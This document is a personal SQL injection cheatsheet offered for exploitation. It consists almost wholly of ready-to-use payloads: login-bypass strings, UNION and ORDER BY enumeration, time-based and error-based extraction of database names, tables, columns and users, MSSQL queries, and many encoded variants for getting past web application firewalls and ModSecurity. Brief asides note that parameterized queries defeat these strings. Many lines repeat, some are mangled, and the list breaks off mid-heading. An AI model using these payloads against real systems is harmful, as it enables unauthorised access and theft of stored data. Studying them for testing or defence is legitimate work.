📀SQL Injection Cheatsheet
Below you will find my cheatsheet for exploiting SQL Injection:

----------------------------------------------------------------
SQL injection
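SQL injection login bypass payloads
These strings only change the login query when the application concatenates the submitted value into the SQL text; when the value is passed as a bound parameter it is compared as plain data and the condition is not altered.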
'-'
' '
'&'
'^'
'*'
' or ''-'
' or '' '
' or ''&'
' or ''^'
' or ''*'
"-"
" "
"&"
"^"
"*"
" or ""-"
" or "" "
" or ""&"
" or ""^"
" or ""*"
or true--
" or true--
' or true--
") or true--
') or true--
' or ''-'
" or ""-"
" or true--
' or true--
admin' --
admin' #
admin'/*
admin' or '1'='1
admin' or '1'='1'--
admin' or '1'='1'#
admin'or 1=1 or ''='
admin' or 1=1
admin' or 1=1--
admin' or 1=1#
admin' or 1=1/*
admin") or ("1"="1
admin") or ("1"="1"--
admin") or ("1"="1"#
admin") or ("1"="1"/*
admin") or "1"="1
admin") or "1"="1"--
admin") or "1"="1"#
admin") or "1"="1"/*
or 1=1
or 1=1--
or 1=1#
or 1=1/*
admin' --
admin' #
admin'/*
admin' or '1'='1
admin' or '1'='1'--
admin' or '1'='1'#
admin' or '1'='1'/*
admin'or 1=1 or ''='
admin' or 1=1
admin' or 1=1--
admin' or 1=1#
admin' or 1=1/*
admin') or ('1'='1
admin') or ('1'='1'--
admin') or ('1'='1'#
admin') or ('1'='1'/*
admin') or '1'='1
admin') or '1'='1'--
admin') or '1'='1'#
admin') or '1'='1'/*
1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055
admin" --
admin" #
admin"/*
admin" or "1"="1
admin" or "1"="1"--
admin" or "1"="1"#
admin" or "1"="1"/*
admin"or 1=1 or ""="
admin" or 1=1
admin" or 1=1--
admin" or 1=1#
admin" or 1=1/*
admin") or ("1"="1
admin") or ("1"="1"--
admin") or ("1"="1"#
admin") or ("1"="1"/*
admin") or "1"="1
admin") or "1"="1"--
admin") or "1"="1"#
admin") or "1"="1"/*
1234 " AND 1=0 UNION ALL SELECT "admin", "81dc9bdb52d04dc20036dbd8313ed055
'or 1=1 limit 1 -- -+
'=' 'or'
or '1'='1
' or '1'='1
' or 'x'='x
' or 0=0 --
" or 0=0 --
or 0=0 --
' or 0=0 #
" or 0=0 #
or 0=0 #
' or 'x'='x
" or "x"="x
') or ('x'='x
' or 1=1--
" or 1=1--
or 1=1--
' or a=a--
" or "a"="a
') or ('a'='a
") or ("a"="a
hi" or "a"="a
hi" or 1=1 --
hi' or 1=1 --
'or'1=1'
==
and 1=1--
and 1=1
' or 'one'='one--
' or 'one'='one
' and 'one'='one
' and 'one'='one--
1') and '1'='1--
admin' --
admin' #
admin'/*
or 1=1--
or 1=1#
or 1=1/*
) or '1'='1--
) or ('1'='1--
' or '1'='1
' or 'x'='x
' or 0=0 --
" or 0=0 --
or 0=0 --
' or 0=0 #
" or 0=0 #
or 0=0 #
' or 'x'='x
" or "x"="x
') or ('x'='x
' or 1=1--
" or 1=1--
or 1=1--
' or a=a--
" or "a"="a
') or ('a'='a
") or ("a"="a
hi" or "a"="a
hi" or 1=1 --
hi' or 1=1 --
'or'1=1'
SQL injection payloads
Detect a SQL error
' = %27
" = %22
# = %23
; = %3B
Detect the number of vulnerable columns
ORDER BY 1--
ORDER BY 2--
ORDER BY 3--
ORDER BY 4--
ORDER BY 5--
ORDER BY 6--
ORDER BY 7--
ORDER BY 8--
ORDER BY 9--
ORDER BY 10--
ORDER BY 1#
ORDER BY 2#
ORDER BY 3#
ORDER BY 4#
ORDER BY 5#
ORDER BY 6#
ORDER BY 7#
ORDER BY 8#
ORDER BY 9#
ORDER BY 10#
Union Select Payloads
UNION SELECT 1
UNION SELECT 1,2
UNION SELECT 1,2,3
UNION SELECT 1,2,3,4
UNION SELECT 1,2,3,4,5
UNION SELECT 1,2,3,4,5,6
UNION SELECT 1,2,3,4,5,6,7
1' UNION SELECT 1-- -
1' UNION SELECT 1,2-- -
1' UNION SELECT 1,2,3-- -
1' UNION SELECT 1,2,3,4-- -
1' UNION SELECT 1,2,3,4,5-- -
1' UNION SELECT 1,2,3,4,5,6-- -
1' UNION SELECT 1,2,3,4,5,6,7-- -
1' UNION SELECT NULL-- -
1' UNION SELECT NULL,NULL-- -
1' UNION SELECT NULL,NULL,NULL-- -
1' UNION SELECT NULL,NULL,NULL,NULL-- -
1' UNION SELECT NULL,NULL,NULL,NULL,NULL-- -
1' UNION SELECT NULL,NULL,NULL,NULL,NULL,NULL-- -
1' UNION SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -
UNION ALL SELECT 1
UNION ALL SELECT 1,2
UNION ALL SELECT 1,2,3
UNION ALL SELECT 1,2,3,4
UNION ALL SELECT 1,2,3,4,5
UNION ALL SELECT 1,2,3,4,5,6
UNION ALL SELECT 1,2,3,4,5,6,7
UNION(SELECT 1)
UNION(SELECT 1,2)
UNION(SELECT 1,2,3)
UNION(SELECT 1,2,3,4)
UNION(SELECT 1,2,3,4,5)
UNION(SELECT 1,2,3,4,5,6)
UNION(SELECT 1,2,3,4,5,6,7)
UNION ALL(SELECT 1)
UNION ALL(SELECT 1,2)
UNION ALL(SELECT 1,2,3)
UNION ALL(SELECT 1,2,3,4)
UNION ALL(SELECT 1,2,3,4,5)
UNION ALL(SELECT 1,2,3,4,5,6)
UNION ALL(SELECT 1,2,3,4,5,6,7)
AND 1 UNION SELECT 1
AND 1 UNION SELECT 1,2
AND 1 UNION SELECT 1,2,3
AND 1 UNION SELECT 1,2,3,4
AND 1 UNION SELECT 1,2,3,4,5
AND 1 UNION SELECT 1,2,3,4,5,6
AND 1 UNION SELECT 1,2,3,4,5,6,7
Union Select + sleep() + BENCHMARK(1000000,MD5('A')) Payloads
UNION SELECT @@VERSION,SLEEP(5),3
UNION SELECT @@VERSION,SLEEP(5),USER(),4
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8
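Techniques to bypass SQL injection filters
The variants in this section express the same keywords through comments, mixed case or encoding, which is why keyword blocklists and regex-based WAF rules are not a sufficient control on their own; the reliable fix is a parameterized query.
Bypass using comments (the /*!...*/ forms are MySQL conditional comments, which the server executes as SQL rather than ignoring)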
/*!UNION*/ /*!SELECT*/ 1
/*!UNION*/ /*!SELECT*/ 1,2
/*!UNION*/ /*!SELECT*/ 1,2,3
/*!UNION*/ /*!SELECT*/ 1,2,3,4
/*!UNION*/ /*!SELECT*/ 1,2,3,4,5
/*!UNION*/ /*!SELECT*/ 1,2,3,4,5,6
/*!UNION*/ /*!SELECT*/ 1,2,3,4,5,6,7
/*!12345UNION*/ /*!12345SELECT*/ 1
/*!12345UNION*/ /*!12345SELECT*/ 1,2
/*!12345UNION*/ /*!12345SELECT*/ 1,2,3
/*!12345UNION*/ /*!12345SELECT*/ 1,2,3,4
/*!12345UNION*/ /*!12345SELECT*/ 1,2,3,4,5
/*!12345UNION*/ /*!12345SELECT*/ 1,2,3,4,5,6
/*!12345UNION*/ /*!12345SELECT*/ 1,2,3,4,5,6,7
/*!12345UNION*/(/*!12345SELECT*/ 1)
/*!12345UNION*/(/*!12345SELECT*/ 1,2)
/*!12345UNION*/(/*!12345SELECT*/ 1,2,3)
/*!12345UNION*/(/*!12345SELECT*/ 1,2,3,4)
/*!12345UNION*/(/*!12345SELECT*/ 1,2,3,4,5)
/*!12345UNION*/(/*!12345SELECT*/ 1,2,3,4,5,6)
/*!12345UNION*/(/*!12345SELECT*/ 1,2,3,4,5,6,7)
bypass using comments + url encoding
/*!%55nion*/%20/*!%53elect*/1
/*!%55nion*/%20/*!%53elect*/%201,2
/*!%55nion*/%20/*!%53elect*/%201,2,3
/*!%55nion*/%20/*!%53elect*/%201,2,3,4
/*!%55nion*/%20/*!%53elect*/%201,2,3,4,5
/*!%55nion*/%20/*!%53elect*/%201,2,3,4,5,6
/*!%55nion*/%20/*!%53elect*/%201,2,3,4,5,6,7
/*!12345%55nion*/ /*!12345%53elect*/ 1
/*!12345%55nion*/ /*!12345%53elect*/ 1,2
/*!1234%55nion*/ /*!12345%53elect*/ 1,2,3
/*!12345%55nion*/ /*!12345%53elect*/ 1,2,3,4
/*!12345%55nion*/ /*!12345%53elect*/ 1,2,3,4,5
/*!12345%55nion*/ /*!12345%53elect*/ 1,2,3,4,5,6
/*!12345%55nion*/ /*!12345%53elect*/ 1,2,3,4,5,6,7
/*!12345%55nion*/(/*!12345%53elect*/ 1)
/*!12345%55nion*/(/*!12345%53elect*/ 1,2)
/*!12345%55nion*/(/*!12345%53elect*/ 1,2,3)
/*!12345%55nion*/(/*!12345%53elect*/ 1,2,3,4)
/*!12345%55nion*/(/*!12345%53elect*/ 1,2,3,4,5)
/*!12345%55nion*/(/*!12345%53elect*/ 1,2,3,4,5,6)
/*!12345%55nion*/(/*!12345%53elect*/ 1,2,3,4,5,6,7)
Information_schema.tables
/*!froM*/ /*!InfORmaTion_scHema*/.tAblES /*!WhERe*/ /*!TaBle_ScHEmA*/=schEMA()-- -
/*!froM*/ /*!InfORmaTion_scHema*/.tAblES /*!WhERe*/ /*!TaBle_ScHEmA*/ like schEMA()-- -
/*!froM*/ /*!InfORmaTion_scHema*/.tAblES /*!WhERe*/ /*!TaBle_ScHEmA*/=database()-- -
/*!froM*/ /*!InfORmaTion_scHema*/.tAblES /*!WhERe*/ /*!TaBle_ScHEmA*/ like database()-- -
/*!FrOm*/+%69nformation_schema./**/columns+/*!50000Where*/+/*!%54able_name*/=hex table
/*!FrOm*/+information_schema./**/columns+/*!12345Where*/+/*!%54able_name*/ like hex table
Order by
/**/ORDER/**/BY/**/
/*!order*/+/*!by*/
/*!ORDER BY*/
/*!50000ORDER BY*/
/*!50000ORDER*//**//*!50000BY*/
/*!12345ORDER*/+/*!BY*/
Concat
CoNcAt()
concat()
CON%08CAT()
CoNcAt()
%0AcOnCat()
/**//*!12345cOnCat*/
/*!50000cOnCat*/(/*!*/)
unhex(hex(concat(table_name)))
unhex(hex(/*!12345concat*/(table_name)))
unhex(hex(/*!50000concat*/(table_name)))
group_concat
/*!group_concat*/()
gRoUp_cOnCAt()
group_concat(/*!*/)
group_concat(/*!12345table_name*/)
group_concat(/*!50000table_name*/)
/*!group_concat*/(/*!12345table_name*/)
/*!group_concat*/(/*!50000table_name*/)
/*!12345group_concat*/(/*!12345table_name*/)
/*!50000group_concat*/(/*!50000table_name*/)
/*!GrOuP_ConCaT*/()
/*!12345GroUP_ConCat*/()
/*!50000gRouP_cOnCaT*/()
/*!50000Gr%6fuP_c%6fnCAT*/()
unhex(hex(group_concat(table_name)))
unhex(hex(/*!group_concat*/(/*!table_name*/)))
unhex(hex(/*!12345group_concat*/(table_name)))
unhex(hex(/*!12345group_concat*/(/*!table_name*/)))
unhex(hex(/*!12345group_concat*/(/*!12345table_name*/)))
unhex(hex(/*!50000group_concat*/(table_name)))
unhex(hex(/*!50000group_concat*/(/*!table_name*/)))
unhex(hex(/*!50000group_concat*/(/*!50000table_name*/)))
convert(group_concat(table_name)+using+ascii)
convert(group_concat(/*!table_name*/)+using+ascii)
convert(group_concat(/*!12345table_name*/)+using+ascii)
convert(group_concat(/*!50000table_name*/)+using+ascii)
CONVERT(group_concat(table_name)+USING+latin1)
CONVERT(group_concat(table_name)+USING+latin2)
CONVERT(group_concat(table_name)+USING+latin3)
CONVERT(group_concat(table_name)+USING+latin4)
CONVERT(group_concat(table_name)+USING+latin5)
Union Select
/*!50000%55nIoN*/ /*!50000%53eLeCt*/
%55nion(%53elect 1,2,3)-- -
+union+distinct+select+
+union+distinctROW+select+
/**//*!12345UNION SELECT*//**/
/**//*!50000UNION SELECT*//**/
/**/UNION/**//*!50000SELECT*//**/
/*!50000UniON SeLeCt*/
union /*!50000%53elect*/
+ #?uNiOn + #?sEleCt
+ #?1q %0AuNiOn all#qa%0A#%0AsEleCt
/*!%55NiOn*/ /*!%53eLEct*/
/*!u%6eion*/ /*!se%6cect*/
+un/**/ion+se/**/lect
uni%0bon+se%0blect
%2f**%2funion%2f**%2fselect
union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A
REVERSE(noinu)+REVERSE(tceles)
/*--*/union/*--*/select/*--*/
union (/*!/**/ SeleCT */ 1,2,3)
/*!union*/+/*!select*/
union+/*!select*/
/**/union/**/select/**/
/**/uNIon/**/sEleCt/**/
+%2F**/+Union/*!select*/
/**//*!union*//**//*!select*//**/
/*!uNIOn*/ /*!SelECt*/
+union+distinct+select+
+union+distinctROW+select+
uNiOn aLl sElEcT
UNIunionON+SELselectECT
/**/union/*!50000select*//**/
0%a0union%a0select%09
%0Aunion%0Aselect%0A
%55nion/**/%53elect
uni<on all="" sel="">/*!20000%0d%0aunion*/+/*!20000%0d%0aSelEct*/
%252f%252a*/UNION%252f%252a /SELECT%252f%252a*/
%0A%09UNION%0CSELECT%10NULL%
/*!union*//*--*//*!all*//*--*//*!select*/
union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A1% 2C2%2C
/*!20000%0d%0aunion*/+/*!20000%0d%0aSelEct*/
+UnIoN/*&a=*/SeLeCT/*&a=*/
union+sel%0bect
+uni*on+sel*ect+
+#1q%0Aunion all#qa%0A#%0Aselect
union(select (1),(2),(3),(4),(5))
UNION(SELECT(column)FROM(table))
%23xyz%0AUnIOn%23xyz%0ASeLecT+
%23xyz%0A%55nIOn%23xyz%0A%53eLecT+
union(select(1),2,3)
union (select 1111,2222,3333)
uNioN (/*!/**/ SeleCT */ 11)
union (select 1111,2222,3333)
+#1q%0AuNiOn all#qa%0A#%0AsEleCt
/**//*U*//*n*//*I*//*o*//*N*//*S*//*e*//*L*//*e*//*c*//*T*/
%0A/**//*!50000%55nIOn*//*yoyu*/all/**/%0A/*!%53eLEct*/%0A/*nnaa*/
+%23sexsexsex%0AUnIOn%23sexsexs ex%0ASeLecT+
+union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A1% 2C2%2C
/*!f****U%0d%0aunion*/+/*!f****U%0d%0aSelEct*/
+%23blobblobblob%0aUnIOn%23blobblobblob%0aSeLe cT+
/*!blobblobblob%0d%0aunion*/+/*!blobblobblob%0d%0aSelEct*/
/union\sselect/g
/union\s+select/i
/*!UnIoN*/SeLeCT
+UnIoN/*&a=*/SeLeCT/*&a=*/
+uni>on+sel>ect+
+(UnIoN)+(SelECT)+
+(UnI)(oN)+(SeL)(EcT)
+’UnI”On’+'SeL”ECT’
+uni on+sel ect+
+/*!UnIoN*/+/*!SeLeCt*/+
/*!u%6eion*/ /*!se%6cect*/
uni%20union%20/*!select*/%20
union%23aa%0Aselect
/**/union/*!50000select*/
/^.*union.*$/ /^.*select.*$/
/*union*/union/*select*/select+
/*uni X on*/union/*sel X ect*/
+un/**/ion+sel/**/ect+
+UnIOn%0d%0aSeleCt%0d%0a
UNION/*&test=1*/SELECT/*&pwn=2*/
un?<ion sel="">+un/**/ion+se/**/lect+
+UNunionION+SEselectLECT+
+uni%0bon+se%0blect+
%252f%252a*/union%252f%252a /select%252f%252a*/
/%2A%2A/union/%2A%2A/select/%2A%2A/
%2f**%2funion%2f**%2fselect%2f**%2f
union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A
/*!UnIoN*/SeLecT+
HTML URL Encode (URL encoding)
union select:
u = %75
n = %6e
i = %69
o = %6f
n = %6e
space = %20
s = %73
e = %65
l = %6c
c = %63
t = %74
SQL payloads
/**8**/and/**8**/0/**8**//*!50000union*//**8**//*!50000select*//**8**/+ numero de columnas +--+
+/*!50000%55nIoN*/+/*!50000%53eLeCt*/+
SELECT * FROM (SELECT count(*), CONCAT((SELECT database()), 0x23, FLOOR(RAND(0)*2)) AS x FROM information_schema.columns GROUP BY x) y --
+uNiOn+(/*!/**/SeleCT*/+1,22,333...)+--+
%55%6e%49%6f%4e(/*!/**/%20SeleCT%20*/%2011,22,33,44,55,66,77,88,90,1010,1111,1212,1313,1414,1515,1616,1717,1818,1919....)
+/*✓*/UnIoN/*✓*/+/*✓*/AlL/*✓*/+(SeLeCt+1,2,3,%27soy%20vulnerable%27,5,6.....)+--+
+div+@a:=(current_user/**_**/())+UNION/**/DISTINCTROW+SELECT+1,2,@a,4+--+
%75nion/**)!*/sele%63%74/**)!*/+1,2,3....
/*!50000%75%6e%69on*/ %73%65%6cect 1,2,3,4,5--
+union(select+1,2,3,4,concat(column_name),6,...+from+information_schema.columns+where+table_name=%22columna%22+limit+1,1)+--+
+union(select+1,2,3,database(),concat(hash,0x3a,hash),6..+from(columna))+--+
SQL injections using SQL functions
SQL injection payload using RPAD function and SOUNDS LIKE
SELECT RPAD(table_name,50,'.') from information_schema.tables where table_schema sounds like database()
SQL injection payload using upper + reverse + right + sounds like to extract information
select upper(reverse(right(reverse(table_name),100)))from information_schema.tables where table_schema sounds like database()
SQL injection using the double Reverse, hex, and unhex
Select unhex(hex(reverse(reverse(elt(1, table_Name))))) from information_schema.tables
SQL injection case
SELECT CASE WHEN (1=1) THEN table_name ELSE '<a href=https://twitter.com/_Y000_>_Y00!_</a>' END from information_schema.tables
SELECT CASE 4 WHEN 1 THEN database() WHEN 2 THEN @@version WHEN 3 THEN table_name ELSE '_Y000!_' END FROM information_schema.tables
SELECT CASE WHEN 1>0 THEN table_name ELSE '_Y000!_' END FROM information_schema.tables
SQL injection case and sounds like
CASE table_type WHEN 'BASE Table' THEN table_name END from information_Schema.tables where table_schema sounds like schema()
SQL IF Function
SELECT IF(STRCMP('1','1'),'_Y000!_',table_name) FROM information_schema.tables
select IF(MID(@@version,1,1)='5',table_name,'_Y000!_') from information_schema.tables
SQL IFNULL
SELECT IFNULL(1+1/0,table_name) FROM information_schema.tables
SQL NULLIF
SELECT NULLIF(table_name,2) from information_schema.tables
SQL injection payload using upper + reverse + right + sounds like
select upper(reverse(right(reverse(table_name),100)))from information_schema.tables where table_schema sounds like database()
SQL injection using double reverse + right + if statement + HTML injection
SELECT reverse(reverse(right(if(1=1,table_name,'<h3><font color=blue> Tablas:</h3>'),100))) from information_schema.tables
SQL injection using HEX-UNHEX functions
SELECT UNHEX(HEX(table_name))from information_schema.tables
SQL injection type error based using Extract value
1%20and+extractvalue(rand(),concat(0x7e,version(),0x7e,user()))--
SQL injection payload using reverse
reverse(right(reverse(data),1))
SQL injection payload using extractvalue
extractvalue(rand(),concat(CHAR(126),database(),CHAR(126)))
SQL injection payload + url encode + timing
-7 %23%0AAND 0--%0A /*!12345UNION*/ /*!12345ALL*/ (/*!12345SELECT*/ 1,sleep(5),'soy vulnerable',BENCHMARK(1000000,MD5('true')),5,6,7,8,9,10,11,12,13)
JSON Generation Functions
select JSON_OBJECT(1, @@version)
select json_array(current_user())
select json_objectagg(1, @@datadir)
select json_arrayagg('_Y000!_')
Mixtures
select json_arrayagg(concat(JSON_OBJECT(concat(JSON_OBJECT(concat(current_user()), concat(@@version))), '_Y000!_')))
SELECT * FROM information_schema.tables WHERE `table_name` REGEXP 'admin'
SELECT IF(IFNULL(1/0,'a'),'NO',JSON_OBJECT(1, concat(table_name))) FROM information_schema.tables WHERE `table_name` REGEXP 'admin'
select UPDATEXML(1,CONCAT('.',1,(SELECT (ELT(1=1,2))),3),1)
select UNHEX(HEX(lpad(table_name,50,'>'))) from information_schema.tables
SELECT TRIM(UpdateXML(table_name, '_Y000_', '1111')) FROM information_schema.tables
select IF(IFNULL(0,'a'),'NO es nulo',JSON_OBJECT(1, concat(table_name))) FROM information_schema.tables
Select if(substring(@@version,'1','1') = "5", 'si', 'no')
Select Unhex(hex(WEIGHT_STRING(table_name))) as 'tables' from information_schema.tables where table_name regexp '^[a | b]'
select UNHEX(HEX(lpad(table_name,50,'>'))) from information_schema.tables
select UPDATEXML(1,CONCAT('.',1,(SELECT (ELT(1=1,2))),3),1)
SELECT TRIM(UpdateXML(table_name, '_Y000_', '1111')) FROM information_schema.tables
SELECT version() FROM (SELECT(SLEEP(5))) a
SELECT * FROM(SELECT COUNT(*),CONCAT(database(),'--',(SELECT (ELT(1=1,version()))),'--','_Y000!_',FLOOR(RAND(1)*1))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x) a
SELECT TRIM(UpdateXML(CONCAT('.',database(),'--',(SELECT (ELT(1=1,@@version))),concat('--',@@datadir)), '_Y000_', '1111'))
SELECT * FROM (SELECT count(*), CONCAT((select json_arrayagg(concat(JSON_OBJECT(concat(JSON_OBJECT(concat(current_user()), concat(@@version))), '_Y000!_')))), 0x23, FLOOR(RAND(0)*1)) AS x FROM information_schema.columns GROUP BY x) y
Select if(now()=sysdate(),(select table_name),0) from information_schema.tables
select json_arrayagg(concat(JSON_OBJECT(concat(JSON_OBJECT(concat(current_user()), concat(@@version))), '_Y000!_')))
SELECT 0 FROM (SELECT count(*), CONCAT((SELECT @@version), 0x23, FLOOR(RAND(0)*4)) AS Y000 FROM information_schema.tables GROUP BY Y000) x
SQL injection + sql god
/*!u%6eion*/ /*!se%6cect*/+1,concat(@:=0,(select count(*)from information_schema.columns where@:=concat(@,'<br>',table_name,'::',column_name)),@),3..
(select(@x)from(select(@x:=0x00),(select(0)from(information_schema.columns)where(table_schema=database())and(0x00)in(@x:=concat+(@x,0x3c62723e,table_name,0x203a3a20,column_name))))x)
CONCAT(Tablas <br>,(SELECT(@x)FROM(SELECT(@x:=0x00),(@NR:=0),(SELECT(0)FROM(INFORMATION_SCHEMA.TABLES)WHERE(TABLE_SCHEMA!=information_schema)AND(0x00)IN(@x:=CONCAT(@x,LPAD(@NR:=@NR%2b1,2,0x30),0x3a20,table_name,0x3c62723e))))x))SQL injection Buffer Overflow / Firewall Crash bypass + xss injection
+and+(select%201)=(Select%200xaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa....)+/*!uNIOn*/+/*!SeLECt*/+1,2,3,4,....+--+
SQL injection payload+ bypass Mod_Security
/*!50000un0x696fn*/+/*!12345AlL*/(/*!50000se0x6c65ct*/+1)+--+
/*!50000%75%6e%69on*/ %73%65%6cect 1,2,3,4...
/*!12345UnioN*//**/(/*!12345seLECT*//**/1)+--
/*!12345#qa%0A#%0AUnIOn*/(/*!12345#qa%0A#%0ASeleCt*//**/1)+--+
/*!50000and*/ /*!50000extractvalue*/(0x0a,/*!50000concat(0x0a,(select JSON_OBJECT(1, current_user())))*/)
%27+or%20.0union/**/distinctrow%23GearFourth%0aselect/**/distinctrow%20
Sql injection payload + god + Mod_Security bypass
/*!50000%75%6e%69on*/ %73%65%6cect 1,cOncAT/**x**/(0b0010001000111110001011110011111000111100001011110110000100111110001011010010110100111110001111000110001001110010001111100011110001100010011100100011111000111100011100110111010001111001011011000110010100111110011101000111001000111010011011100111010001101000001011010110001101101000011010010110110001100100001010000110010101110110011001010110111000101001001000000111101100100000011000100110000101100011011010110110011101110010011011110111010101101110011001000010110101100011011011110110110001101111011100100011101000100000001000110110011000110010011001100011001001100110001100100011101101111101011101000110000101100010011011000110010101111011011101110110100101100100011101000110100000111010001101010011000001110000011110000011101101101111011101100110010101110010011001100110110001101111011101110011101001100001011101010111010001101111001110110111110100111100001011110111001101110100011110010110110001100101001111100011110001110100011000010110001001101100011001010011111000111100011000100011111001001101011011110110010001011111011100110110010101100011011101010111001001101001011101000111100100100000011000100111100101110000011000010111001101110011001000000110001001111001001000000100110001110101011010010111001100100000010011010110000101100100011001010111001001101111001000000010100001011111010110010011000000110000001100000010000101011111001010010011110000101111011000100011111000111100011000100111001000111110,user/**x**/(),0b00111100011000100111001000111110,dAtAbaSe/**x**/(),0b00111100011000100111001000111110,version/**x**/(),0b001111000110001001110010001111100011110001100010011100100011111000111100011101000111001000111110001111000111010001101000001111100101010001000001010000100100110001000101010100110011110000101111011101000110100000111110001111000111010001101000001111100100001101001111010011000101010101001101010011100101001100111100001011110111010001101000001111100011110000101111011101000111001000111110,(select(@x)/*!50000from/**8**/*/
(/*!50000select/**8**/*/(@x:=0b00000000),(select(0)/*!From/**8**/*/(/*!50000information_schema.columns/**8**/*/)/*!50000where/**8**/*/(table_schema=database/**_**/())and(0b00000000)in(@x:=/*!50000coNcat/**8**/*/(@x,0b001111000111010001110010001111100011110001110100011001000011111000111100011001100110111101101110011101000010000001100011011011110110110001101111011100100011110101110010011001010110010000111110,/*!50000table_name/**8**/*/,0b00111100001011110110011001101111011011100111010000111110001111000010111101110100011001000011111000111100011101000110010000111110,/*!50000column_name/**8**/*/))))x)),3.4
Sql injection payload + comment + hex/unhex
/*!50000select*/unhex(hex(/*!12345concat*/(0x223e,version(),0x223e,database())))
SQL databases and tables
/*!50000COnCaT/**8**/*/(0x3c68313e5f59303030215f3c2f68313e,0x3c703e56657273696f6e3a203c2f703e,@@version,0x3c62723e,0x3c703e486f73746e616d653a203c2f703e,@@hostname,0x3c62723e,0x3c703e446174616261736573203a203c2f703e,(select%20grouP_ConCat(/*!50000schema_name/**8**/*/,0x3c62723e)+/*!50000fRom/**8**/*/+/*!50000iNfoRmAtiOn_sChEmA/**_**/.ScHeMaTa*/),0x3c62723e,0x3c703e5461626c6573203a203c2f703e,(select%20grouP_ConCat(/*!50000table_name/**8**/*/,0x3c62723e)+/*!50000fRom/**8**/*/+/*!50000iNfoRmAtiOn_sChEmA/**_**/.TabLes*/))
concat(0x3c68313e5f59303030215f3c2f68313e,0x3c703e56657273696f6e3a203c2f703e,@@version,0x3c62723e,0x3c703e486f73746e616d653a203c2f703e,@@hostname,0x3c62723e,0x3c703e446174616261736573203a203c2f703e,(select%20grouP_ConCat(/*!50000schema_name/**8**/*/,0x3c62723e)+/*!50000fRom/**8**/*/+/*!50000iNfoRmAtiOn_sChEmA/**_**/.ScHeMaTa*/),(select(@x)from(select(@x:=0x00),(select(0)from(information_schema.columns)where(table_schema=database())and(0x00)in(@x:=concat+(@x,0x3c62723e,table_name,0x203a3a20,column_name))))x))
concat(0x3c68313e5f59303030215f3c2f68313e,0x3c703e56657273696f6e3a203c2f703e,@@version,0x3c62723e,0x3c703e486f73746e616d653a203c2f703e,@@hostname,0x3c62723e,0x3c62723e,0x3c613e50726976696c6567696f733a203c2f613e,0x3c62723e,(SELECT+GROUP_CONCAT(GRANTEE,0x202d3e20,IS_GRANTABLE,0x3c62723e)+FROM+INFORMATION_SCHEMA.USER_PRIVILEGES),0x3c62723e,0x3c703e446174616261736573203a203c2f703e,(select grouP_ConCat(/*!50000schema_name/**8**/*/,0x3c62723e)+/*!50000fRom/**8**/*/+/*!50000iNfoRmAtiOn_sChEmA/**_**/.ScHeMaTa*/),0x3c62723e,0x3c613e5461626c61733a203c2f613e,0x3c62723e,(select(@x)from(select(@x:=0x00),(select(0)from(information_schema.columns)where(table_schema=database())and(0x00)in(@x:=concat+(@x,0x3c62723e,table_name,0x203a3a20,column_name))))x))SQL injection payload + URL encode
+/*!12120%55%6e%49%6f%4e*/+(%53%65%4c%65%43%74+111,222,333,database(),555,...)+--+
MSSQL
-- : Comment Type 1
--+ : Comment Type 2
--+- : SQL Comment
/**/ : Inline Comment
;%00 : Null Byte
@@version : Current Version
user_name() : Current User
user : Current User
db_name() : Current Database
@@SERVERNAME : Hostname
Tables
union select table_name from (select top 1 table_name from information_schema.tables order by 1) as 1 order by 1 desc--
Columns
union select column_name from (select top 1 column_name from information_schema.columns where table_name='table' order by 1) as 1 order by 1 desc--
Dump info
union select column form table--
XPath injection (MySQL XML functions extractvalue/updatexml, not MSSQL)
+and extractvalue(0x0a,concat(0x0a,(select version())))
+and updatexml(null,concat(0x0a,(select version())),null)
+and extractvalue(0x0a,concat(0x0a,(select database())))
+and updatexml(null,concat(0x0a,(select database())),null)
+and extractvalue(0x0a,concat(0x0a,(select table_name from information_schema.tables where table_schema=database() limit 0,1)))
+and updatexml(null,concat(0x0a,(select table_name from information_schema.tables where table_schema=database() limit 0,1)),null)
+and extractvalue(0x0a,concat(0x0a,(select column_name from information_schema.columns where table_schema=database() and table_name=0x6e6f6d627265 limit 0,1)))
+and updatexml(null,concat(0x0a,(select column_name from information_schema.columns where table_schema=database() and table_name=0x6e6f6d627265 limit 0,1)),null)
+and extractvalue(0x0a,concat(0x0a,(select concat(columna) from tabla limit 0,1)))
+and updatexml(null,concat(0x0a,(select concat(columna) from tabla limit 0,1)),null)
Error based
Version:
+OR+1+GROUP+BY+CONCAT_WS(0x3a,VERSION(),FLOOR(RAND(0)*2))+HAVING+MIN(0)+OR+1
Database():
+AND(SELECT+1+FROM+(SELECT+COUNT(*),CONCAT((SELECT(SELECT+CONCAT(CAST(DATABASE()+AS+CHAR),0x7e))+FROM+INFORMATION_SCHEMA.TABLES+WHERE+table_schema=DATABASE()+LIMIT+0,1),FLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.TABLES+GROUP+BY+x)a)
Tables:
+AND(SELECT+1+FROM+(SELECT+COUNT(*),CONCAT((SELECT(SELECT+CONCAT(CAST(table_name+AS+CHAR),0x7e))+FROM+INFORMATION_SCHEMA.TABLES+WHERE+table_schema=0x7461626c65+LIMIT+0,1),FLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.TABLES+GROUP+BY+x)a)
Columns:
+AND+(SELECT+1+FROM+(SELECT+COUNT(*),CONCAT((SELECT(SELECT+CONCAT(CAST(column_name+AS+CHAR),0x7e))+FROM+INFORMATION_SCHEMA.COLUMNS+WHERE+table_name=0x636f6c756d6e61+AND+table_schema=0x7461626c65+LIMIT+0,1),FLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.TABLES+GROUP+BY+x)a)
Extract information:
